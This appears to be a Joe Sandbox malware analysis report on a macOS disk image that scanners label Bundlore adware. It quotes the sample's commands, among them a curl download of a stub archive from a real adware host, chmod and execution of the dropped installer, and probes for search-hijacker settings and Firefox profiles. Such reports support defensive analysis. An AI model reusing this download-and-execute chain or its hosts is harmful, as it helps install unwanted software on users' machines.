
Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 53411
Start time: 09:18:53
Joe Sandbox Product: Cloud
Start date: 11.05.2018
Overall analysis duration: 0h 6m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: kkoVCFZzgV (renamed file extension from none to dmg)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal76.macDMG@0/23@4/0

Detection

Strategy: Threshold
Score: 76
Range: 0 - 100
Detection: malicious

Classification

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos | Avira: Label: ADWARE/OSX.Bundlore.amdgw
Antivirus detection for submitted file
Source: kkoVCFZzgV.dmg | Avira: Label: ADWARE/OSX.Bundlore.gixtg

Cryptography:

Executes the "openssl" command used for cryptographic operations
Source: /bin/bash (PID: 821) | Openssl executable: /usr/bin/openssl -> openssl base64 -d -A
Source: /bin/bash (PID: 822) | Openssl executable: /usr/bin/openssl -> openssl base64 -d -A
Source: /bin/bash (PID: 826) | Openssl executable: /usr/bin/openssl -> openssl base64 -d -A
Source: /bin/bash (PID: 827) | Openssl executable: /usr/bin/openssl -> openssl base64 -d -A

Networking:

Downloads compressed data via HTTP
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx/1.6.3
    Content-Type: application/octet-stream
    Content-Length: 283326
    Last-Modified: Wed, 04 Apr 2018 15:30:28 GMT
    ETag: "5ac4ef94-452be"
    Accept-Ranges: bytes
    Date: Fri, 11 May 2018 07:20:04 GMT
    Connection: keep-alive
    X-N: S
    Data Raw: 1f 8b 08 00 65 ef c4 5a 00 03 ec 7d 09 7c 13 45 fb f0 ce ec 91 a4 d9 2d db 72 9f 4d af f4 6e d3 f4 3e 38 4a cb 51 8e d2 93 1b 4a da a6 6d 68 9b 94 24 e5 46 76 40 41 05 91 5b 0e 95 5b 4e 41 41 10 e4 10 11 05 11 91 1b 44 40 50 11 50 44 14 14 05 94 6f 66 93 a6 07 a5 fa fe df ff ef fd 7e df ef 7b b3 a4 99 dd 99 79 9e 67 e6 b9 9f dd 84 f0 88 8a 8a 30 93 d9 66 37 94 97 87 55 18 0a 2d b6 70 43 65 65 04 f5 bf f9 d2 e9 74 71 31 31 1a f9 33 d6 f1 a9 d3 47 3b 3e 9d 2f 4d 64 94 3e 36 32 32 36 2e 46 17 a9 d1 45 c6 c4 c5 c4 52 9a 98 ff 55 2a 9e f2 aa c2 4b b7 62 52 0c a3 4d a3 0d 26 db 53 c7 e1 61 c5 c5 8d c0 71 ae c3 f5 f9 ff c8 2b bc 61 fe a7 5a cc 76 a3 d9 6e fb 5f 11 84 7f c6 ff c8 e8 38 7d 74 5c 9c 3e 0a f3 1f b3 3f ea bf fc ff 4f bc fe 8e ff f9 a9 96
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /sdl/mmStub.tar.gz?ts=1526030402 HTTP/1.1
    Host: qylhi.comedyohio.win
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /Mac/getInstallerSpecs/?&channel=b4500&info=&newInstallerVM=true&vm= HTTP/1.1
    Host: service.macinstallerinfo.com
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected:
    GET /download/Mac/InstallerResources/eula_mymediadownloader.txt HTTP/1.1
    Host: cdn.macresourcescdn.com
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected:
    GET /download/Mac/InstallerResources/header01.jpg HTTP/1.1
    Host: cdn.macresourcescdn.com
    Accept: */*
    Cookie: __cfduid=d5e13ab547ef9c0adb671d1395c24fded1526023211
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
Source: global traffic | HTTP traffic detected:
    GET /download/Mac/InstallerResources/MediaDownloader-Logo.png HTTP/1.1
    Host: cdn.macresourcescdn.com
    Accept: */*
    Cookie: __cfduid=d5e13ab547ef9c0adb671d1395c24fded1526023211
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
Source: global traffic | HTTP traffic detected:
    GET /tracking/cm_mac.php?clickid=0&funnel=generateScreen-0 HTTP/1.1
    Host: service.macinstallerinfo.com
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected:
    GET /?click_id=0&event=generateScreen-0 HTTP/1.1
    Host: events.ponystudent.win
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: qylhi.comedyohio.win
Urls found in memory or binary data
Source: kkoVCFZzgV.dmg | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

Persistence and Installation Behavior:

Executes the "rm" command used to delete files or directories
Source: /bin/bash (PID: 828) | Rm executable: /bin/rm -> rm -rf /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp
Many shell processes execute programs via execve syscall (may be indicative for malicious behavior)
Source: /bin/sh (PID: 835) | Shell process: ps -wwo args 818
Source: /bin/sh (PID: 836) | Shell process: tail -1
Source: /bin/sh (PID: 837) | Shell process: sed -nE s/(\/bin\/bash[ ]?)([^ ]+).*/\2/p
Source: /bin/sh (PID: 839) | Shell process: defaults find hspart=iry
Source: /bin/sh (PID: 840) | Shell process: defaults find v=insMac
Source: /bin/sh (PID: 841) | Shell process: defaults find bndl
Source: /bin/sh (PID: 842) | Shell process: defaults find chumsearch
Source: /bin/sh (PID: 843) | Shell process: defaults find SearchQuick
Source: /bin/sh (PID: 845) | Shell process: ls /Users/henry/Library/Application Support/Firefox/Profiles/
Source: /bin/sh (PID: 846) | Shell process: sort -n
Source: /bin/sh (PID: 847) | Shell process: head -n 1
Source: /bin/sh (PID: 848) | Shell process: defaults find search-quick
Source: /bin/sh (PID: 850) | Shell process: ls /Users/henry/Library/Application Support/Firefox/Profiles/
Source: /bin/sh (PID: 851) | Shell process: sort -n
Source: /bin/sh (PID: 852) | Shell process: head -n 1
Source: /bin/sh (PID: 853) | Shell process: defaults find racksearch
Source: /bin/sh (PID: 854) | Shell process: defaults find linkeysearch
Queries for attached disk images with shell command 'hdiutil'
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Hdiutil command executed: /usr/bin/hdiutil info -plist
Creates application bundles
Source: /usr/bin/tar (PID: 831) | Bundle Info.plist file created: mm-install-macos.app/Contents/Info.plist
Creates code signed application bundles
Source: /usr/bin/tar (PID: 831) | Bundle code signature resource file created: mm-install-macos.app/Contents/_CodeSignature/CodeResources
Creates hidden files, links and/or directories
Source: /usr/bin/tar (PID: 831) | Hidden file created: mm-install-macos.app/Contents/._Info.plist.388mtA
Executes commands using a shell command-line interpreter
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: /bin/sh -c ps -wwo args 818 | tail -1 | sed -nE 's/(\/bin\/bash[ ]?)([^ ]+).*/\2/p'
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find hspart=iry
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find v=insMac
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find bndl
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find chumsearch
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find SearchQuick
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c ls '/Users/henry/Library/Application Support/Firefox/Profiles/' | sort -n | head -n 1
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find search-quick
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find racksearch
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Shell command executed: sh -c defaults find linkeysearch
Executes the "chmod" command used to modify permissions
Source: /bin/bash (PID: 832) | Chmod executable: /bin/chmod -> chmod +x /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 830) | Curl executable: /usr/bin/curl -> curl -s -L -o /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/stmp.tar.gz http://qylhi.comedyohio.win/sdl/mmStub.tar.gz?ts=1526030402
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 829) | Mkdir executable: /bin/mkdir -> mkdir -p /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 835) | Ps executable: /bin/ps -> ps -wwo args 818
Reads launchservices plist files
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/tar (PID: 831) | File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos
Writes icon files to disk
Source: /usr/bin/tar (PID: 831) | File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/locked.icns
Source: /usr/bin/tar (PID: 831) | File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/mm-install-macos.icns
Creates application bundles containing icon files
Source: /usr/bin/tar (PID: 831) | Icon file created: mm-install-macos.app/Contents/Resources/locked.icns
Source: /usr/bin/tar (PID: 831) | Icon file created: mm-install-macos.app/Contents/Resources/mm-install-macos.icns
Executes the "sed" command used to modify input streams (typically from files or pipes)
Source: /bin/sh (PID: 837) | Sed executable: /usr/bin/sed -> sed -nE s/(\/bin\/bash[ ]?)([^ ]+).*/\2/p
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /usr/bin/tar (PID: 831) | XML plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Info.plist
Source: /usr/bin/tar (PID: 831) | Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/MainWindow.nib
Source: /usr/bin/tar (PID: 831) | Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/__TBT_Template_Base.nib
Source: /usr/bin/tar (PID: 831) | Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/__TBT_RequestForm.nib
Source: /usr/bin/tar (PID: 831) | XML plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/_CodeSignature/CodeResources

System Summary:

Classification label
Source: classification engine | Classification label: mal76.macDMG@0/23@4/0

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Sysctl read request: kern.safeboot (1.66)

Lowering of HIPS / PFW / Operating System Security Settings:

Executes the "defaults" command used to read or modify user specific settings
Source: /bin/sh (PID: 839) | Defaults executable: /usr/bin/defaults -> defaults find hspart=iry
Source: /bin/sh (PID: 840) | Defaults executable: /usr/bin/defaults -> defaults find v=insMac
Source: /bin/sh (PID: 841) | Defaults executable: /usr/bin/defaults -> defaults find bndl
Source: /bin/sh (PID: 842) | Defaults executable: /usr/bin/defaults -> defaults find chumsearch
Source: /bin/sh (PID: 843) | Defaults executable: /usr/bin/defaults -> defaults find SearchQuick
Source: /bin/sh (PID: 848) | Defaults executable: /usr/bin/defaults -> defaults find search-quick
Source: /bin/sh (PID: 853) | Defaults executable: /usr/bin/defaults -> defaults find racksearch
Source: /bin/sh (PID: 854) | Defaults executable: /usr/bin/defaults -> defaults find linkeysearch

Language, Device and Operating System Detection:

Reads process information of other processes
Source: /bin/ps (PID: 835) | Sysctl requested: kern.proc.pid (1.14.1) only found for 1.14.1.818 -> queries PID 818
Source: /bin/ps (PID: 835) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.818 -> queries PID 818
Reads hardware related sysctl values
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Sysctl read request: hw.availcpu (6.25)
Reads the systems OS release and/or type
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Sysctl requested: kern.ostype (1.1)
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | Sysctl requested: kern.osrelease (1.2)
Reads the systems hostname
Source: /Users/henry/Desktop/unpack/Install/Install.app/Contents/MacOS/Install (PID: 818) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 834) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 839) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 840) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 841) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 842) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 843) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 844) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 848) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 849) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 853) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 854) | Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist


Runtime Messages

Command: open "/Users/henry/Desktop/unpack/Install/Install.app"
Exitcode: 0
Killed: False
Standard Output:
Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
[Behavior graph rendered as an image in the original; only its text content is recoverable here.]
Behavior Graph ID: 53411 | Sample: kkoVCFZzgV | Startdate: 11/05/2018 | Architecture: MAC | Score: 76
Network nodes: qylhi.comedyohio.win (195.176.255.152, port 80, SWITCH, Switzerland); service.macinstallerinfo.com (104.239.223.14, port 80, Rackspace Hosting, United States); 2 other IPs or domains
Process tree: Install (via xpcproxy) -> bash mm-install-macos, bash rm, bash tar, 6 other processes (including 3x bash openssl); bash tar drops /private/var/folde...OS/mm-install-macos (Mach-O); mm-install-macos -> sh (ps, tail, sed), sh (ls, sort, head), sh (ls, sort, head), 9 other processes
Graph signatures: Antivirus detection for dropped file; Antivirus detection for submitted file; Queries for attached disk images with shell command 'hdiutil'; Executes the "rm" command used to delete files or directories; Many shell processes execute programs via execve syscall (may be indicative for malicious behavior); Executes the "defaults" command used to read or modify user specific settings; Reads process information of other processes

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

Source: kkoVCFZzgV.dmg | Detection: 100% | Scanner: Avira | Label: ADWARE/OSX.Bundlore.gixtg

Dropped Files

Source: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos | Detection: 100% | Scanner: Avira | Label: ADWARE/OSX.Bundlore.amdgw

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

Screenshots